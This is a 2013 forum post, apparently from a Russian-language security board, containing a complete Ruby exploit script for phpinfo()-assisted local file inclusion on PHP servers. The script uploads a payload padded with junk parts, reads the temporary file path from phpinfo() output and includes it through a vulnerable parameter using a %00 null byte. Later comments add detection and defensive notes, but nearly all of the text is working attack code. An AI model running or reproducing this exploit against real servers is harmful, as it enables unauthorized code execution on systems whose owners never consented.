
20.09.2013, 16:05
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме: 0
Репутация:
0
Как-то так, не знаю, как объяснить.
Код:
require 'socket'
require 'uri'
require 'net/http'
# Proof-of-concept posted to the forum: a phpinfo()-assisted local file
# inclusion (LFI). It POSTs a multipart upload to a page that calls phpinfo(),
# reads the temporary upload path ([tmp_name]) back out of the phpinfo()
# output, and then requests that path through an include parameter with a
# trailing %00.
#
# Documented from the defender's side: each step names the request it emits
# (so the traffic can be recognised) and the server-side condition it needs
# (so it can be removed). Two preconditions are visible in the constants
# below: a reachable phpinfo() page and a request parameter that is used as
# an include path. The host 'www' in the URLs is a placeholder left by the
# poster; the script hard-codes port 80.
#
# @return [nil, false] nil on most exits, false when the TCP connect fails;
#   the caller ignores the value.
def main()
#setting up
puts "SETTING UP"
target = 'http://www/phpinfo.php' # phpinfo() -- page whose output is scraped; exposing phpinfo() on a production host is the first precondition
lfi = 'http://www/include.php?file=' # LFI template like http://www.host.com/data/lfi.php?location={LFI} -- second precondition: a parameter passed to include()
payloadLocation = 'payload.txt' # payload -- local file whose contents become the body of the uploaded part
junkFilesCount = 50 # tail -- number of extra multipart parts appended after the payload (the loop below runs junkFilesCount + 1 times)
recvBufferSize = 1024 # receive buffer size -- chunk size for recv and the value handed to SO_RCVBUF
# just echo for u
printDotted(' -target:')
print("[#{target}]\n");
printDotted(' -lfi:')
print("[#{lfi}]\n");
printDotted(' -payload:')
print("[#{payloadLocation}]\n");
printDotted(' -junk files count:')
print("[#{junkFilesCount}]\n");
printDotted(' -receive buffer size:')
print("[#{recvBufferSize}]\n");
# try to load payload
begin
printDotted('LOAD PAYLOAD')
payload = IO.read(payloadLocation)
print("[OK]\n")
rescue
# bare rescue: any StandardError (missing file, permissions) ends the run here
print("[ERROR]\n")
return
end
# payload
# Multipart body built by string concatenation with a fixed boundary.
# The filename attribute carries a CR LF before the name ("\r\npayload.txt");
# its purpose is not evident from the script, and the phpinfo() regex further
# down still expects "[name] => payload.txt", so the server is assumed to
# strip it -- TODO confirm.
file = "-----------------------------89q8834898293409rw29\r\n"
file += "Content-Disposition: form-data; name=\"file_loader\"; filename=\"\r\npayload.txt\"\r\n"
file += "Content-Type: text/plain\r\n\r\n"
file += "#{payload}\r\n"
file += "-----------------------------89q8834898293409rw29\r\n"
# generate junk files
# Each extra part has a randomly named field, a filename made of a random
# number repeated 10000 times (tens of kilobytes per part) and the body
# "superslow". Presumably this keeps the server busy with the request so the
# temporary upload stays on disk long enough to be included -- TODO confirm.
# Detection: a multipart POST to a phpinfo() page with dozens of parts and
# kilobyte-scale filename attributes.
printDotted('PREPARE JUNK')
curJunkFiles = 0; # assigned, never read
for junkFiles in 0..junkFilesCount # inclusive range: junkFilesCount + 1 iterations
file += "-----------------------------89q8834898293409rw29\r\n"
file += "Content-Disposition: form-data; name=\"file" + rand(10000).to_s + "\"; filename=\"\r\njunk" + rand(1000000).to_s * 10000 + ".txt\"\r\n"
file += "Content-Type: text/plain\r\n\r\n"
file += "superslow\r\n"
file += "-----------------------------89q8834898293409rw29\r\n"
end
print("[OK]\n")
printDotted('prepare headers')
targetURI = URI(target)
query = targetURI.path
# add query if not empty
if !targetURI.query.nil?
query += '?' + targetURI.query
end
# headers
# Hand-built HTTP/1.0 request written straight to a TCP socket (Net::HTTP is
# only used for the second request). The fixed User-Agent string below is a
# usable signature for this particular script.
req = "POST #{query} HTTP/1.0\r\n"
req += "Content-Type: multipart/form-data; boundary=---------------------------89q8834898293409rw29\r\n"
req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
req += "User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\r\n"
req += "Host: #{targetURI.host}\r\n"
req += "Content-Length: #{file.length}\r\n"
req += "Connection: Close\r\n\r\n"
req += file
print("[OK]\n")
# create tcp socket
sock = Socket.new(:INET, :STREAM)
# and set receive buffer size
# A 1 KiB kernel receive buffer; presumably so the server drains its response
# slowly and the request stays in flight longer -- TODO confirm.
sock.setsockopt(Socket::SOL_SOCKET, Socket::SO_RCVBUF, recvBufferSize)
printDotted('connecting to')
begin
# port 80 is hard-coded; targetURI.port and any https scheme are ignored
sock.connect(Socket.pack_sockaddr_in(80, targetURI.host))
rescue
print("[ERROR]\n")
return false
end
print("[OK]\n")
sock.write(req)
data = ''
payloadFound = false # set below, never read
loaderFound = false # unused
payloadFileName = ''
loaderFileName = '' # unused
# Read the response in recvBufferSize chunks and re-scan everything received
# so far for the $_FILES dump that phpinfo() prints. The socket is never
# closed explicitly; it is released when the method returns.
while true
printDotted("get next #{recvBufferSize} bytes")
tmpData = sock.recv(recvBufferSize)
print("[OK]\n")
# NOTE(review): recv returns an empty String at end of stream, not nil, so
# this guard does not end the loop on EOF; only a regex match (return below)
# or an exception leaves it.
if tmpData.nil?
break
end
data += tmpData
# Matches phpinfo()'s print_r-style rendering of $_FILES -- the [name],
# [type] and [tmp_name] lines for the uploaded payload.txt -- and captures
# the temporary path. This is the information leak the whole script depends
# on; removing phpinfo() from reachable paths removes it.
tmpFileName = data.scan(/\[name\]\s=>\spayload.txt\n\s\s\s\s\[type\]\s=>\stext\/plain\n\s\s\s\s\[tmp_name\]\s=>\s(.*?)\n\s\s\s\s\[error\]/)
if tmpFileName.length > 0
payloadFound = true
payloadFileName = tmpFileName[0][0].clone
printDotted('payload file location:')
print('[' + payloadFileName + ']' + "\n")
# Append the temp path plus an encoded null byte (%00) to the include
# parameter. The %00 is meant to cut off whatever the target script appends
# to the path; PHP from 5.3.4 on rejects paths containing a null byte, which
# closes this step. Detection: a GET whose parameter value is an absolute
# temp-directory path ending in %00.
lfi += payloadFileName + '%00'
lfiURI = URI(lfi)
printDotted("Include #{payloadFileName}")
# Second request: fetch the include URL. Success is judged only on an HTTP
# 200 status; the response body is not inspected.
response = Net::HTTP.get_response(lfiURI);
if !response.is_a?(Net::HTTPOK) then
print("[ERROR]\n")
return
else
print("[OK]\n")
end
# first match ends the run regardless of outcome
return
end
end
end
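# Prints +msg+ padded with dots to a fixed 50-column width, without a
# newline, so a status tag such as "[OK]" can be appended on the same line.
#
# @param msg [String] label to print
# @return [nil] the result of +print+
def printDotted(msg)
  # clamp the pad at zero: the original computed 50 - msg.length directly,
  # and String#* raises ArgumentError on a negative count once msg is
  # longer than 50 characters
  print msg + "." * [50 - msg.length, 0].max
end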
# Script entry point: there is no __FILE__ guard, so loading this file
# runs the requests immediately.
main()